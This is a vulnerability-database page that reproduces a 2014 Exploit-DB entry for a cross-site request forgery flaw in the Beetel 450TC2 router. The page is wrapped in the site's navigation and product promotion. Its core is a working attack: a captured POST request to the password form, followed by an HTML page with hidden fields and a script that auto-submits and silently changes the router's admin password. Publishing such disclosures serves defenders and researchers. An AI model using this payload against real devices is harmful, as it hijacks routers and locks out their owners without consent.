Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)

🗓️ 30 Apr 2014 00:00:00Reported by shyamkumar somanaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 40 Views

Beetel 450TC2 Router Cross-Site Request Forgery Vulnerabilit

Code
​​<!--
# Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
Forgery Vulnerability
# Date: 30/04/2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: www.beetel.in
# Version: 450TC2 - Firmware version : TX6-0Q-005_retail
# Tested on: Windows 8

#Beetel 450TC2 Router is vulnerable for cross site request forgery
vulnerability in change password page.
#Affected Resource/Form : Forms/tools_admin_1


###################################################################################

Post Request:

POST /Forms/tools_admin_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101
Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/maintenance/tools_admin.htm
Authorization: Basic YWRtaW46c3lhbXNvbWFuYQ==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

uiViewTools_Password=NEW_PASSWORD&uiViewTools_PasswordConfirm=NEW_PASSWORD

###################################################################################

#Exploit:
-->

<html>
  <body>
    <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
      <input type="hidden" name="uiViewTools_Password" value="123456789" />
      <input type="hidden" name="uiViewTools_PasswordConfirm" value="123456789" />
      <input type="submit" value="Submit form" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Apr 2014 00:00Current
7.4High risk
Vulners AI Score7.4
vulnerabilityroutercross-site requestforgeryadmin passwordexploitformpost requestfirmware versionwindows 8beetel websiteauthorizationhttp_referer.
40